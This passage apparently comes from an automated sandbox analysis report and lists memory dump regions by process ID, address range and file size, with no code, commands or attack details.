                                                                                                                          • memory/728-87-0x000002C5325D0000-0x000002C5325FC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/728-93-0x000002C5325D0000-0x000002C5325FC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/908-98-0x0000022578C30000-0x0000022578C5C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/908-104-0x0000022578C30000-0x0000022578C5C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/908-105-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/992-109-0x000001D0EFC00000-0x000001D0EFC2C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            176KB

                                                                                                                          • memory/1676-18-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            9.9MB

                                                                                                                          • memory/1676-14-0x00000000009D0000-0x00000000009E8000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            96KB

                                                                                                                          • memory/1676-960-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            9.9MB

                                                                                                                          • memory/1676-961-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            9.9MB

                                                                                                                          • memory/2080-28-0x000001F27E620000-0x000001F27E696000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            472KB

                                                                                                                          • memory/2080-47-0x00007FFE9D460000-0x00007FFE9D63B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            1.9MB

                                                                                                                          • memory/2080-48-0x00007FFE9AA30000-0x00007FFE9AADE000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            696KB

                                                                                                                          • memory/2080-25-0x000001F27E460000-0x000001F27E482000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/2080-46-0x000001F27E7A0000-0x000001F27E7CA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/2772-1-0x00000000004F0000-0x000000000052A000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            232KB

                                                                                                                          • memory/2772-2-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            9.9MB

                                                                                                                          • memory/2772-19-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            9.9MB

                                                                                                                          • memory/2772-0-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/4424-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4424-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4424-57-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4424-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4424-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4424-60-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4424-58-0x00007FFE9D460000-0x00007FFE9D63B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            1.9MB

                                                                                                                          • memory/4424-59-0x00007FFE9AA30000-0x00007FFE9AADE000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            696KB